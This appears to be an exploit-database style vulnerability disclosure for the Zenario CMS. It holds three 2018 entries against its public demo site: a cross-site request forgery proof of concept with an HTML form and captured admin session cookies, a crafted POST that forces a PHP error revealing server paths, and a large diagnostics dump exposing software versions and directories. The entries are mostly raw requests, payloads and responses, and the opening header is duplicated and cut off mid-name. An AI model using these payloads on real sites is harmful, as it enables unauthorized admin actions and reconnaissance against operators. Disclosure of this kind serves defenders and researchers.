---------------------------
# Exploit Title: Zenar Content Management System - Cross-Site Request Forgery ( CSRF )
# Software Link: https://zenar.io/
# Dork: N/A
# Author: Ismail T ---------------------------
# Exploit Title: Zenar Content Management System - Cross-Site Request Forgery ( CSRF )
# Software Link: https://zenar.io/
# Dork: N/A
# Author: Ismail Tasdelen
# Tested Website: http://demo.zenar.io
# Date: 2018-05-21
# Category: Web Application
# POC :
# GET Request :
Request URL: http://demo.zenar.io/zenario/admin/organizer.ajax.php?path=zenario__content%2Fpanels%2Fcontent&skinId=&refinerId=html&refinerName=content_type&refiner__content_type=html&_limit=50&_start=0&_item=html_10&_sort_col=first_created_datetime&_sort_desc=0
Request Method: GET
Status Code: 200 OK
Remote Address: 213.146.173.88:80
Referrer Policy: no-referrer-when-downgrade
Accept: text/plain, */*; q=0.01
Accept-Encoding: gzip, deflate
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
Connection: keep-alive
Cookie: PHPSESSID=1jltufrek0ugagehl7fjieeud6; COOKIE_LAST_ADMIN_USER=admin; cookies_accepted=1
Host: demo.zenar.io
Referer: http://demo.zenar.io/zenario/admin/organizer.php?fromCID=1&fromCType=html
User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900P Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.181 Mobile Safari/537.36
X-Requested-With: XMLHttpRequest
# Query String Parametres :
path: zenario__content/panels/content
skinId:
refinerId: html
refinerName: content_type
refiner__content_type: html
_limit: 50
_start: 0
_item: html_10
_sort_col: first_created_datetime
_sort_desc: 0
# CSRF HTML :
<html><head>
<title> Zenar Content Management System - Cross-Site Request Forgery ( CSRF ) </title>
</head><body>
<form action="http://demo.zenar.io/zenario/admin/organizer.php?fromCID=1&fromCType=html#zenario__content/panels/content/refiners/content_type//html//html_" method="GET">
<input type="text" name="html_" value="10" /><br />
<input type='submit' value='Go!' />
</form>
</body></html>
---------------------------
# Exploit Title: Zenar Content Management System - Disclosure Sensitive Data
# Software Link: https://zenar.io/
# Dork: N/A
# Author: Ismail Tasdelen
# Tested Website: http://demo.zenar.io
# Date: 2018-05-22
# Category: Web Application
# POC :
Description :
This page contains an error/warning message that may disclose sensitive information.
The message can also contain the location of the file that produced the unhandled exception.
This may be a false positive if the error message is found in documentation pages.
Parameters : /zenario/admin/welcome.ajax.php
Example : http://localhost/zenario/admin/welcome.ajax.php
Attack details :
URL encoded POST input _box was set to %7B%22tab%22%3A%22login%22%2C%22tabs%22%3A%7B%22login%22%3A%7B%22
edit_mode%22%3A%7B%22on%22%3A%221%22%7D%2C%22fields%22%3A%7B%22reset%22%3A%7B%22_was_hidden_before%22%3A
true%7D%2C%22description%22%3A%7B%7D%2C%22username%22%3A%7B%22current_value%22%3A%22e%22%7D%2C%22password
%22%3A%7B%22current_value%22%3A%22%22%7D%2C%22remember_me%22%3A%7B%22current_value%22%3Afalse%7D%2C%22
login%22%3A%7B%22pressed%22%3Afalse%7D%2C%22forgot%22%3A%7B%22pressed%22%3Atrue%7D%2C%22previous
%22%3A%7B%22pressed%22%3Afalse%7D%7D%7D%2C%22forgot%22%3A%7B%22edit_mode%22%3A%7B%22on%22%3A%221%22%7D%2C%22
fields%22%3A%7B%22description%22%3A%7B%7D%2C%22email%22%3A%7B%22current_value%22%3A%22%22%7D%2C%22previous
%22%3A%7B%7D%2C%22reset%22%3A%7B%7D%7D%7D%7D%2C%22path%22%3A%22login%22%7D
Error message found:
<b>Warning</b>: json_decode() expects parameter 1 to be string, array given in <b>
/var/www/zenario-source/Zenario-8.1/zenario/admin/welcome.ajax.php</b> on line <b>82</b><br />
Request :
POST /zenario/admin/welcome.ajax.php?get=[]&task= HTTP/1.1
Content-Length: 782
Content-Type: application/x-www-form-urlencoded
Referer: http://demo.zenar.io:80/zenario/admin/organizer.php?fromCID=1&fromCType=html
Cookie: PHPSESSID=j1n5kr9af7k6iqcdmbq1pgudp4
Host: demo.zenar.io
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0
Accept: */*
_box[]=%7B%22tab%22%3A%22login%22%2C%22tabs%22%3A%7B%22login%22%3A%7B%22edit_mode
%22%3A%7B%22on%22%3A%221%22%7D%2C%22fields%22%3A%7B%22reset%22%3A%7B%22_was_hidden_before
%22%3Atrue%7D%2C%22description%22%3A%7B%7D%2C%22username%22%3A%7B%22current_value
%22%3A%22e%22%7D%2C%22password%22%3A%7B%22current_value%22%3A%22%22%7D%2C%22
remember_me%22%3A%7B%22current_value%22%3Afalse%7D%2C%22login%22%3A%7B%22pressed
%22%3Afalse%7D%2C%22forgot%22%3A%7B%22pressed%22%3Atrue%7D%2C%22previous%22%3A%7B%22
pressed%22%3Afalse%7D%7D%7D%2C%22forgot%22%3A%7B%22edit_mode
%22%3A%7B%22on%22%3A%221%22%7D%2C%22fields%22%3A%7B%22description%22%3A%7B%7D%2C%22
email%22%3A%7B%22current_value%22%3A%22%22%7D%2C%22previous%22%3A%7B%7D%2C%22
reset%22%3A%7B%7D%7D%7D%7D%2C%22path%22%3A%22login%22%7D&_validate=true
Response :
HTTP/1.1 200 OK
Date: Mon, 21 May 2018 20:52:01 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: PHPSESSID=j1n5kr9af7k6iqcdmbq1pgudp4; path=/; HttpOnly
Vary: Accept-Encoding
Content-Length: 2568
Keep-Alive: timeout=5, max=19
Connection: Keep-Alive
Content-Type: text/javascript; charset=UTF-8
Original-Content-Encoding: gzip
The impact of this vulnerability :
The error messages may disclose sensitive information. This information can be used to launch further attacks.
How to fix this vulnerability :
Review the source code for this script.
---------------------------
# Exploit Title: Zenar Content Management System - Disclosure Username/Password Sensitive Data
# Software Link: https://zenar.io/
# Dork: N/A
# Author: Ismail Tasdelen
# Tested Website: http://demo.zenar.io
# Date: 2018-05-22
# Category: Web Application
# POC :
Description :
A username and/or password was found in this file. This information could be sensitive.
Example : http://localhost/zenario/admin/welcome.ajax.php
# DATA :
{"key":{"first_viewing":false},"tab":"0","tabs":[{"edit_mode":{"enabled":"1","on":"1","always_on":"1"},"show_errors_after_field":"description","fields":{"description":{"full_width":"1","snippet":{"html":"<h1>Diagnostics</h1>"},"ord":1},"sub_table":{"type":"grouping","name":"sub_table","ord":2,"value":""},"system_requirements":{"grouping":"sub_table","full_width":"1","snippet":{"html":"System Requirements"},"visible_if":"zenarioAW.togglePressed(1)","ord":3,"row_class":"section_valid"},"show_system_requirements":{"grouping":"sub_table","type":"toggle","redraw_onchange":"1","same_row":"1","visible_if":"zenarioAW.togglePressed(1, tuixObject)","ord":4},"server":{"grouping":"sub_table","full_width":"1","row_class":"sub_section_valid","snippet":{"html":"Web Server"},"visible_if":"zenarioAW.togglePressed(2)","ord":5},"show_server":{"grouping":"sub_table","type":"toggle","redraw_onchange":"1","same_row":"1","visible_if":"zenarioAW.togglePressed(2, tuixObject)","ord":6},"server_1":{"grouping":"sub_table","full_width":"1","row_class":"sub_valid","snippet":{"html":"Apache http server version 2.4.7 or later"},"visible_if":"zenarioAW.togglePressed()","ord":7,"post_field_html":" (<em>you have version Server version: Apache/2.4.18 (Ubuntu) Server built: 2017-09-18T15:09:02</em>)"},"php":{"grouping":"sub_table","full_width":"1","row_class":"sub_section_valid","snippet":{"html":"PHP"},"visible_if":"zenarioAW.togglePressed(2)","ord":8},"show_php":{"grouping":"sub_table","type":"toggle","redraw_onchange":"1","same_row":"1","visible_if":"zenarioAW.togglePressed(2, tuixObject)","ord":9},"php_1":{"grouping":"sub_table","full_width":"1","row_class":"sub_valid","snippet":{"html":"PHP version 7.0 or later"},"visible_if":"zenarioAW.togglePressed()","ord":10,"post_field_html":" (<em>you have version 7.0.28-0ubuntu0.16.04.1</em>)"},"opcache_misconfigured":{"grouping":"sub_table","full_width":"1","row_class":"sub_level","snippet":{"html":"In your <code>php.ini</code> you have <code>opcache.enable</code>
turned on, and you have <code>opcache.dups_fix</code> turned off.
This may cause occasional PHP “fatal errors” on your site.
Please edit your <code>php.ini</code> and either turn <code>opcache.enable</code> off
or else turn <code>opcache.dups_fix</code> on."},"visible_if":"zenarioAW.togglePressed()","ord":11,"hidden":true},"mysql":{"grouping":"sub_table","full_width":"1","row_class":"sub_section_valid","snippet":{"html":"MySQL"},"visible_if":"zenarioAW.togglePressed(2)","ord":12},"show_mysql":{"grouping":"sub_table","type":"toggle","redraw_onchange":"1","same_row":"1","visible_if":"zenarioAW.togglePressed(2, tuixObject)","ord":13},"mysql_1":{"grouping":"sub_table","full_width":"1","row_class":"sub_valid","snippet":{"html":"MySQLi extension enabled in PHP"},"visible_if":"zenarioAW.togglePressed()","ord":14},"mysql_2":{"grouping":"sub_table","full_width":"1","row_class":"sub_valid","snippet":{"html":"MySQL client and MySQL server version 5.5.3 or later"},"visible_if":"zenarioAW.togglePressed()","ord":15,"post_field_html":" (<em>your client is version mysql Ver 14.14 Distrib 5.7.20, for Linux (x86_64) using EditLine wrapper</em>)"},"mb":{"grouping":"sub_table","full_width":"1","row_class":"sub_section_valid","snippet":{"html":"Unicode Support"},"visible_if":"zenarioAW.togglePressed(2)","ord":16},"show_mb":{"grouping":"sub_table","type":"toggle","redraw_onchange":"1","same_row":"1","visible_if":"zenarioAW.togglePressed(2, tuixObject)","ord":17},"mb_1":{"grouping":"sub_table","full_width":"1","row_class":"sub_valid","snippet":{"html":"ctype extension enabled in PHP"},"visible_if":"zenarioAW.togglePressed()","ord":18},"mb_2":{"grouping":"sub_table","full_width":"1","row_class":"sub_valid","snippet":{"html":"mbstring extension enabled in PHP"},"visible_if":"zenarioAW.togglePressed()","ord":19},"gd":{"grouping":"sub_table","full_width":"1","row_class":"sub_section_valid","snippet":{"html":"Image Manipulation"},"visible_if":"zenarioAW.togglePressed(2)","ord":20},"show_gd":{"grouping":"sub_table","type":"toggle","redraw_onchange":"1","same_row":"1","visible_if":"zenarioAW.togglePressed(2, tuixObject)","ord":21},"gd_1":{"grouping":"sub_table","full_width":"1","row_class":"sub_valid","snippet":{"html":"GD Library enabled in PHP"},"visible_if":"zenarioAW.togglePressed()","ord":22},"gd_2":{"grouping":"sub_table","full_width":"1","row_class":"sub_valid","snippet":{"html":"GIF Read Support enabled in PHP"},"visible_if":"zenarioAW.togglePressed()","ord":23},"gd_3":{"grouping":"sub_table","full_width":"1","row_class":"sub_valid","snippet":{"html":"JPG Support enabled in PHP"},"visible_if":"zenarioAW.togglePressed()","ord":24},"gd_4":{"grouping":"sub_table","full_width":"1","row_class":"sub_valid","snippet":{"html":"PNG Support enabled in PHP"},"visible_if":"zenarioAW.togglePressed()","ord":25},"optional":{"grouping":"sub_table","full_width":"1","row_class":"sub_section_valid","snippet":{"html":"Optional requirements"},"visible_if":"zenarioAW.togglePressed(2)","ord":26},"show_optional":{"grouping":"sub_table","type":"toggle","redraw_onchange":"1","same_row":"1","visible_if":"zenarioAW.togglePressed(2, tuixObject)","ord":27},"optional_mod_deflate":{"grouping":"sub_table","full_width":"1","row_class":"sub_valid","snippet":{"html":"deflate module enabled in Apache
<br/><small>Needed for compressing files, for a faster page-load</small>"},"visible_if":"zenarioAW.togglePressed()","ord":28},"optional_mod_expires":{"grouping":"sub_table","full_width":"1","row_class":"sub_valid","snippet":{"html":"expires module enabled in Apache
<br/><small>Needed for images and files to be cached in the visitors browser, for a faster page-load</small>"},"visible_if":"zenarioAW.togglePressed()","ord":29},"optional_mod_rewrite":{"grouping":"sub_table","full_width":"1","row_class":"sub_valid","snippet":{"html":"rewrite module enabled in Apache
<br/><small>Needed for friendly URLs</small>"},"visible_if":"zenarioAW.togglePressed()","ord":30},"optional_curl":{"grouping":"sub_table","full_width":"1","row_class":"sub_valid","snippet":{"html":"curl extension enabled in PHP
<br/><small>Needed for translating pages using Google Translate</small>"},"visible_if":"zenarioAW.togglePressed()","ord":31},"optional_zip":{"grouping":"sub_table","full_width":"1","row_class":"sub_valid","snippet":{"html":"zip extension enabled in PHP
<br/><small>Needed for creating document extracts</small>"},"visible_if":"zenarioAW.togglePressed()","ord":32},"dirs":{"grouping":"sub_table","full_width":"1","snippet":{"html":"Directories"},"visible_if":"zenarioAW.togglePressed(1)","ord":33,"row_class":"section_valid"},"show_dirs":{"grouping":"sub_table","type":"toggle","redraw_onchange":"1","same_row":"1","visible_if":"zenarioAW.togglePressed(1, tuixObject)","ord":34},"dir_1":{"grouping":"sub_table","full_width":"1","row_class":"sub_section_valid","snippet":{"html":"Backup Storage Area"},"visible_if":"zenarioAW.togglePressed(2)","ord":35},"show_dir_1":{"grouping":"sub_table","type":"toggle","redraw_onchange":"1","same_row":"1","visible_if":"zenarioAW.togglePressed(2, tuixObject)","ord":36},"dir_1_blurb":{"grouping":"sub_table","full_width":"1","row_class":"sub_field","snippet":{"html":"If you wish to store site backups on your server, you should create a directory
on your server in which to keep them.
It should start with a slash, but do not add a trailing slash."},"visible_if":"zenarioAW.togglePressed()","ord":37},"backup_dir":{"grouping":"sub_table","full_width":"1","row_class":"sub_field","type":"text","visible_if":"zenarioAW.togglePressed()","ord":38,"value":"/var/www/clients/zenario_demo/backup","readonly":true},"backup_dir_status":{"grouping":"sub_table","full_width":"1","snippet":{"html":"The directory <code>backup</code> exists and is writable."},"visible_if":"zenarioAW.togglePressed()","ord":39,"row_class":"sub_valid"},"dir_2":{"grouping":"sub_table","full_width":"1","row_class":"sub_section_valid","snippet":{"html":"Document Secure Store (Docstore)"},"visible_if":"zenarioAW.togglePressed(2)","ord":40},"show_dir_2":{"grouping":"sub_table","type":"toggle","redraw_onchange":"1","same_row":"1","visible_if":"zenarioAW.togglePressed(2, tuixObject)","ord":41},"dir_2_blurb":{"grouping":"sub_table","full_width":"1","row_class":"sub_field","snippet":{"html":"You should create a directory on your server where Documents can be stored by the CMS.
Please enter the absolute path to the directory.
It should start with a slash, but do not add a trailing slash."},"visible_if":"zenarioAW.togglePressed()","ord":42},"docstore_dir":{"grouping":"sub_table","full_width":"1","row_class":"sub_field","type":"text","visible_if":"zenarioAW.togglePressed()","ord":43,"value":"/var/www/clients/zenario_demo/docstore_staging","readonly":true},"docstore_dir_status":{"grouping":"sub_table","full_width":"1","row_class":"sub_valid","snippet":{"html":"The directory <code>docstore_staging</code> exists and is writable."},"visible_if":"zenarioAW.togglePressed()","ord":44},"dir_3":{"grouping":"sub_table","full_width":"1","row_class":"sub_section_valid","snippet":{"html":"Templates Directory"},"visible_if":"zenarioAW.togglePressed(2)","ord":45},"show_dir_3":{"grouping":"sub_table","type":"toggle","redraw_onchange":"1","same_row":"1","visible_if":"zenarioAW.togglePressed(2, tuixObject)","ord":46},"dir_3_blurb":{"grouping":"sub_table","full_width":"1","row_class":"sub_field","snippet":{"html":"Zenario uses template files to form the layout of web pages.
These may be edited by an administrator, and Zenario writes them to the following directory.
Please ensure it exists and is writable by the web server:"},"visible_if":"zenarioAW.togglePressed()","ord":47},"template_dir":{"grouping":"sub_table","full_width":"1","row_class":"sub_field","type":"text","readonly":"readonly","visible_if":"zenarioAW.togglePressed()","ord":48,"value":"/var/www/clients/zenario_demo/public_html_live/zenario_custom/templates/grid_templates"},"template_dir_status":{"grouping":"sub_table","full_width":"1","row_class":"sub_valid","snippet":{"html":"The directory <code>grid_templates</code> exists and is writable."},"visible_if":"zenarioAW.togglePressed()","ord":49},"dir_4":{"grouping":"sub_table","full_width":"1","row_class":"sub_section_valid","snippet":{"html":"CSS Directories"},"visible_if":"zenarioAW.togglePressed(2)","ord":50,"hidden":false},"show_dir_4":{"grouping":"sub_table","type":"toggle","redraw_onchange":"1","same_row":"1","visible_if":"zenarioAW.togglePressed(2, tuixObject)","ord":51,"hidden":false},"dir_4_blurb":{"grouping":"sub_table","full_width":"1","row_class":"sub_field","snippet":{"html":"CSS for plugins may be edited by an administrator, and Zenario writes CSS files to the following directory. Please ensure it exists and is writable by the web server:"},"visible_if":"zenarioAW.togglePressed()","ord":52,"hidden":false},"skin_dir_1":{"grouping":"sub_table","full_width":"1","row_class":"sub_field","type":"text","readonly":"readonly","visible_if":"zenarioAW.togglePressed()","ord":53,"value":"/var/www/clients/zenario_demo/public_html_live/zenario_custom/templates/grid_templates/skins/deep_dive/editable_css/","current_value":"/var/www/clients/zenario_demo/public_html_live/zenario_custom/templates/grid_templates/skins/deep_dive/editable_css/","hidden":false},"skin_dir_status_1":{"grouping":"sub_table","full_width":"1","row_class":"sub_valid","snippet":{"html":"The directory <code>editable_css</code> exists and is writable."},"visible_if":"zenarioAW.togglePressed()","ord":54,"hidden":false},"skin_dir_2":{"grouping":"sub_table","full_width":"1","row_class":"sub_field","type":"text","readonly":"readonly","visible_if":"zenarioAW.togglePressed()","ord":55,"value":"","hidden":true},"skin_dir_status_2":{"grouping":"sub_table","full_width":"1","row_class":"sub_field","snippet":{"html":" "},"visible_if":"zenarioAW.togglePressed()","ord":56,"hidden":true},"skin_dir_3":{"grouping":"sub_table","full_width":"1","row_class":"sub_field","type":"text","readonly":"readonly","visible_if":"zenarioAW.togglePressed()","ord":57,"value":"","hidden":true},"skin_dir_status_3":{"grouping":"sub_table","full_width":"1","row_class":"sub_field","snippet":{"html":" "},"visible_if":"zenarioAW.togglePressed()","ord":58,"hidden":true},"skin_dir_4":{"grouping":"sub_table","full_width":"1","row_class":"sub_field","type":"text","readonly":"readonly","visible_if":"zenarioAW.togglePressed()","ord":59,"value":"","hidden":true},"skin_dir_status_4":{"grouping":"sub_table","full_width":"1","row_class":"sub_field","snippet":{"html":" "},"visible_if":"zenarioAW.togglePressed()","ord":60,"hidden":true},"skin_dir_5":{"grouping":"sub_table","full_width":"1","row_class":"sub_field","type":"text","readonly":"readonly","visible_if":"zenarioAW.togglePressed()","ord":61,"value":"","hidden":true},"skin_dir_status_5":{"grouping":"sub_table","full_width":"1","row_class":"sub_field","snippet":{"html":" "},"visible_if":"zenarioAW.togglePressed()","ord":62,"hidden":true},"skin_dir_6":{"grouping":"sub_table","full_width":"1","row_class":"sub_field","type":"text","readonly":"readonly","visible_if":"zenarioAW.togglePressed()","ord":63,"value":"","hidden":true},"skin_dir_status_6":{"grouping":"sub_table","full_width":"1","row_class":"sub_field","snippet":{"html":" "},"visible_if":"zenarioAW.togglePressed()","ord":64,"hidden":true},"skin_dir_7":{"grouping":"sub_table","full_width":"1","row_class":"sub_field","type":"text","readonly":"readonly","visible_if":"zenarioAW.togglePressed()","ord":65,"value":"","hidden":true},"skin_dir_status_7":{"grouping":"sub_table","full_width":"1","row_class":"sub_field","snippet":{"html":" "},"visible_if":"zenarioAW.togglePressed()","ord":66,"hidden":true},"skin_dir_8":{"grouping":"sub_table","full_width":"1","row_class":"sub_field","type":"text","readonly":"readonly","visible_if":"zenarioAW.togglePressed()","ord":67,"value":"","hidden":true},"skin_dir_status_8":{"grouping":"sub_table","full_width":"1","row_class":"sub_field","snippet":{"html":" "},"visible_if":"zenarioAW.togglePressed()","ord":68,"hidden":true},"skin_dir_9":{"grouping":"sub_table","full_width":"1","row_class":"sub_field","type":"text","readonly":"readonly","visible_if":"zenarioAW.togglePressed()","ord":69,"value":"","hidden":true},"skin_dir_status_9":{"grouping":"sub_table","full_width":"1","row_class":"sub_field","snippet":{"html":" "},"visible_if":"zenarioAW.togglePressed()","ord":70,"hidden":true},"dir_5":{"grouping":"sub_table","full_width":"1","row_class":"sub_section_valid","snippet":{"html":"Cache Directory"},"visible_if":"zenarioAW.togglePressed(2)","ord":71},"show_dir_5":{"grouping":"sub_table","type":"toggle","redraw_onchange":"1","same_row":"1","visible_if":"zenarioAW.togglePressed(2, tuixObject)","ord":72},"dir_5_blurb":{"grouping":"sub_table","full_width":"1","row_class":"sub_field","snippet":{"html":"Zenario can store generated files in a cache directory to speed up performance and reduce load on the database.
Please ensure it exists and is writable by the web server:"},"visible_if":"zenarioAW.togglePressed()","ord":73},"cache_dir":{"grouping":"sub_table","full_width":"1","row_class":"sub_field","type":"text","readonly":"readonly","visible_if":"zenarioAW.togglePressed()","ord":74,"value":"/var/www/clients/zenario_demo/public_html_live/cache"},"cache_dir_status":{"grouping":"sub_table","full_width":"1","row_class":"sub_valid","snippet":{"html":"The "cache" directory exists and is writable."},"visible_if":"zenarioAW.togglePressed()","ord":75},"dir_6":{"grouping":"sub_table","full_width":"1","row_class":"sub_section_valid","snippet":{"html":"Private Directory"},"visible_if":"zenarioAW.togglePressed(2)","ord":76},"show_dir_6":{"grouping":"sub_table","type":"toggle","redraw_onchange":"1","same_row":"1","visible_if":"zenarioAW.togglePressed(2, tuixObject)","ord":77},"dir_6_blurb":{"grouping":"sub_table","full_width":"1","row_class":"sub_field","snippet":{"html":"Zenario uses a cache directory to store documents and images temporarily
while they are downloaded by users.
Please ensure it exists and is writable by the web server:"},"visible_if":"zenarioAW.togglePressed()","ord":78},"private_dir":{"grouping":"sub_table","full_width":"1","row_class":"sub_field","type":"text","readonly":"readonly","visible_if":"zenarioAW.togglePressed()","ord":79,"value":"/var/www/clients/zenario_demo/public_html_live/private"},"private_dir_status":{"grouping":"sub_table","full_width":"1","row_class":"sub_valid","snippet":{"html":"The "private" directory exists and is writable."},"visible_if":"zenarioAW.togglePressed()","ord":80},"dir_7":{"grouping":"sub_table","full_width":"1","row_class":"sub_section_valid","snippet":{"html":"Public Directory"},"visible_if":"zenarioAW.togglePressed(2)","ord":81},"show_dir_7":{"grouping":"sub_table","type":"toggle","redraw_onchange":"1","same_row":"1","visible_if":"zenarioAW.togglePressed(2, tuixObject)","ord":82},"dir_7_blurb":{"grouping":"sub_table","full_width":"1","row_class":"sub_field","snippet":{"html":"Zenario uses a directory to store documents that are publicly available.
This directory MUST be writable by the web server."},"visible_if":"zenarioAW.togglePressed()","ord":83},"public_dir":{"grouping":"sub_table","full_width":"1","row_class":"sub_field","type":"text","readonly":"readonly","visible_if":"zenarioAW.togglePressed()","ord":84,"value":"/var/www/clients/zenario_demo/public_html_live/public"},"public_dir_status":{"grouping":"sub_table","full_width":"1","row_class":"sub_valid","snippet":{"html":"The "public" directory exists and is writable."},"visible_if":"zenarioAW.togglePressed()","ord":85},"site":{"grouping":"sub_table","full_width":"1","snippet":{"html":"Site configuration"},"hide_on_install":"1","visible_if":"zenarioAW.togglePressed(1)","ord":86,"row_class":"section_warning"},"show_site":{"grouping":"sub_table","type":"toggle","redraw_onchange":"1","same_row":"1","hide_on_install":"1","visible_if":"zenarioAW.togglePressed(1, tuixObject)","ord":87,"pressed":true},"site_description_missing":{"grouping":"sub_table","full_width":"1","row_class":"sub_level","snippet":{"html":"This site's description file is missing.
Please create the <code>zenario_custom/site_description.yaml</code> file,
e.g. by copying or symlinking one of the files from the
<code>zenario/api/sample_site_descriptions/</code> directory."},"hide_on_install":"1","visible_if":"zenarioAW.togglePressed()","ord":88,"hidden":true},"site_disabled":{"grouping":"sub_table","full_width":"1","row_class":"valid","snippet":{"html":"Your site is enabled."},"hide_on_install":"1","visible_if":"zenarioAW.togglePressed()","ord":89},"site_special_pages_unpublished":{"grouping":"sub_table","full_width":"1","row_class":"valid","snippet":{"html":""},"hide_on_install":"1","visible_if":"zenarioAW.togglePressed()","ord":90,"hidden":true},"public_documents":{"grouping":"sub_table","full_width":"1","row_class":"valid","snippet":{"html":""},"hide_on_install":"1","visible_if":"zenarioAW.togglePressed()","ord":91,"hidden":true},"site_automated_backups":{"grouping":"sub_table","full_width":"1","row_class":"valid","snippet":{"html":"Automated backups are running."},"hide_on_install":"1","visible_if":"zenarioAW.togglePressed()","ord":92},"scheduled_task_manager":{"grouping":"sub_table","full_width":"1","row_class":"valid","snippet":{"html":""},"hide_on_install":"1","visible_if":"zenarioAW.togglePressed()","ord":93,"hidden":true},"spare_domains_without_primary_domain":{"grouping":"sub_table","full_width":"1","row_class":"sub_level","snippet":{"html":"Domain name redirects have been created for this site, but they will not function because no primary domain is defined.
Please go to
<a href="organizer.php#zenario__administration/panels/site_settings//domains~.site_settings~tprimary_domain~k{"id"%3A"domains"}" target="_blank">
<em>Domains</em> in the site settings
</a>
to define a primary domain."},"hide_on_install":"1","visible_if":"zenarioAW.togglePressed()","ord":94,"hidden":true},"forwarded_ip_misconfigured":{"grouping":"sub_table","full_width":"1","row_class":"sub_level","snippet":{"html":"The <code>USE_FORWARDED_IP</code> constant is enabled
in your <code>zenario_siteconfig.php</code> file,
but you are not using a load balancer or a proxy,
or your load balancer or proxy is misconfigured."},"visible_if":"zenarioAW.togglePressed()","ord":95,"hidden":true},"errors_not_shown":{"grouping":"sub_table","full_width":"1","row_class":"warning","snippet":{"html":"Your site is in development mode,
but if you're developing modules you would not be able to see PHP errors and notices.
(The <code>ERROR_REPORTING_LEVEL</code>
should be set to <code>(E_ALL | E_NOTICE | E_STRICT)</code>
in your <code>zenario_siteconfig.php</code> file - or
click the hammer icon at the bottom left of Organizer
to fully enable the site.)"},"hide_on_install":"1","visible_if":"zenarioAW.togglePressed()","ord":96,"hidden":false},"notices_shown":{"grouping":"sub_table","full_width":"1","row_class":"sub_level","snippet":{"html":"Your site is in production mode, but you are showing PHP notices.
<br/>
(The <code>ERROR_REPORTING_LEVEL</code>
should be set to <code>(E_ALL & ~E_NOTICE & ~E_STRICT)</code>
in your <code>zenario_siteconfig.php</code> file.)"},"hide_on_install":"1","visible_if":"zenarioAW.togglePressed()","ord":97,"hidden":true},"email_addresses_overridden":{"grouping":"sub_table","full_width":"1","row_class":"sub_level","snippet":{"html":""},"hide_on_install":"1","visible_if":"zenarioAW.togglePressed()","ord":98,"hidden":true},"missing_modules":{"grouping":"sub_table","full_width":"1","row_class":"sub_level","snippet":{"html":""},"hide_on_install":"1","visible_if":"zenarioAW.togglePressed()","ord":99,"hidden":true},"bad_extra_module_symlinks":{"grouping":"sub_table","full_width":"1","row_class":"sub_level","snippet":{"html":""},"hide_on_install":"1","visible_if":"zenarioAW.togglePressed()","ord":100,"hidden":true},"module_errors":{"grouping":"sub_table","full_width":"1","row_class":"sub_level","snippet":{"html":""},"hide_on_install":"1","visible_if":"zenarioAW.togglePressed()","ord":101,"hidden":true},"no_ssl_for_login":{"grouping":"sub_table","full_width":"1","row_class":"warning","snippet":{"html":"This site has a login for extranet users,
but doesn't use HTTPS to secure the transmission of passwords and other personal data.
We recommend you ask your system administrator to make this site run using HTTPS."},"hide_on_install":"1","visible_if":"zenarioAW.togglePressed()","ord":102,"hidden":false},"two_factor_security":{"grouping":"sub_table","full_width":"1","row_class":"warning","snippet":{"html":"This site contains user-related data,
but you are not protecting your admin-login with two-factor authentication.
Please edit the <code>zenario_custom/site_description.yaml</code> file
to enable two-factor authentication."},"hide_on_install":"1","visible_if":"zenarioAW.togglePressed()","ord":103,"hidden":false},"robots_txt":{"grouping":"sub_table","full_width":"1","row_class":"sub_level","snippet":{"html":""},"hide_on_install":"1","visible_if":"zenarioAW.togglePressed()","ord":104,"hidden":true},"content":{"grouping":"sub_table","full_width":"1","snippet":{"html":"Site content"},"hide_on_install":"1","visible_if":"zenarioAW.togglePressed(1)","ord":105,"row_class":"section_warning"},"show_content":{"grouping":"sub_table","type":"toggle","redraw_onchange":"1","same_row":"1","hide_on_install":"1","visible_if":"zenarioAW.togglePressed(1, tuixObject)","ord":106,"pressed":true},"content_nothing_unpublished":{"grouping":"sub_table","full_width":"1","row_class":"valid","snippet":{"html":"You have no unpublished content items."},"hide_on_install":"1","visible_if":"zenarioAW.togglePressed()","ord":107,"hidden":true},"content_unpublished_1":{"grouping":"sub_table","full_width":"1","row_class":"warning","snippet":{"html":"<a target="blank" href="http://demo.zenar.io/news-list"><span class="organizer_item_image content_draft"></span>html_44/news-list</a> is in draft mode."},"hide_on_install":"1","visible_if":"zenarioAW.togglePressed()","ord":108,"hidden":false},"content_unpublished_2":{"grouping":"sub_table","full_width":"1","row_class":"warning","snippet":{"html":"<a target="blank" href="http://demo.zenar.io/gallery"><span class="organizer_item_image content_draft"></span>html_43/gallery</a> is in draft mode."},"hide_on_install":"1","visible_if":"zenarioAW.togglePressed()","ord":109,"hidden":false},"content_unpublished_3":{"grouping":"sub_table","full_width":"1","row_class":"warning","snippet":{"html":"<a target="blank" href="http://demo.zenar.io/news/news-1"><span class="organizer_item_image content_draft"></span>news_5/news-1</a> is in draft mode."},"hide_on_install":"1","visible_if":"zenarioAW.togglePressed()","ord":110,"hidden":false},"content_unpublished_4":{"grouping":"sub_table","full_width":"1","row_class":"warning","snippet":{"html":"<a target="blank" href="http://demo.zenar.io/news/news-2"><span class="organizer_item_image content_draft"></span>news_6/news-2</a> is in draft mode."},"hide_on_install":"1","visible_if":"zenarioAW.togglePressed()","ord":111,"hidden":false},"content_unpublished_5":{"grouping":"sub_table","full_width":"1","row_class":"warning","snippet":{"html":"<a target="blank" href="http://demo.zenar.io/home-staging"><span class="organizer_item_image content_draft"></span>html_41/home-staging</a> is in draft mode."},"hide_on_install":"1","visible_if":"zenarioAW.togglePressed()","ord":112,"hidden":false},"content_more_unpublished":{"grouping":"sub_table","full_width":"1","row_class":"warning","snippet":{"html":"3 other pages are in draft mode. <a target="blank" href="organizer.php#zenario__content/panels/content/refiners/work_in_progress////">View...</a>"},"hide_on_install":"1","visible_if":"zenarioAW.togglePressed()","ord":113,"hidden":false},"continue":{"value":"Continue","type":"submit","full_width":"1","style":"float: right;","ord":114},"check_again":{"value":"Check again","type":"submit","same_row":"1","style":"float: right;","ord":115,"hidden":false},"skin_dir_status_0":{"hidden":false},"skin_dir_0":{"hidden":false}},"ord":1,"errors":[]}],"path":"diagnostics","_task":false}
The impact of this vulnerability : Possible sensitive information disclosure.
How to fix this vulnerability : Remove this file from your website or change its permissions to remove access.
